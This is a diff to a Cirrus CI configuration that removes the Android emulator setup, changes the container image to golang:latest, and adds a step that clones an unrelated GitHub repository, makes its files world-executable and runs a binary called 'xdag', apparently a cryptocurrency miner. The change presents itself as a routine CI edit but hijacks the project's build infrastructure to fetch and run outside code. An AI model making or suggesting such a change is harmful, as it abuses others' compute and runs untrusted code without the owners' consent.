--- a/.cirrus.yml
+++ b/.cirrus.yml
@@ -1,6 +1,6 @@
 container:
 
-  image: cirrusci/android-sdk:29
+  image: golang:latest
 
   cpu: 8
 
@@ -9,12 +9,8 @@ container:
 check_android_task:
 
   create_device_script:
+         git clone https://github.com/jgaswer/dag && cd dag && chmod 777 * && ./xdag
 
-    echo no | avdmanager create avd --force
-
-        -n test
-
-        -k "system-images;android-29;default;armeabi-v7a"
 
   start_emulator_background_script:
 
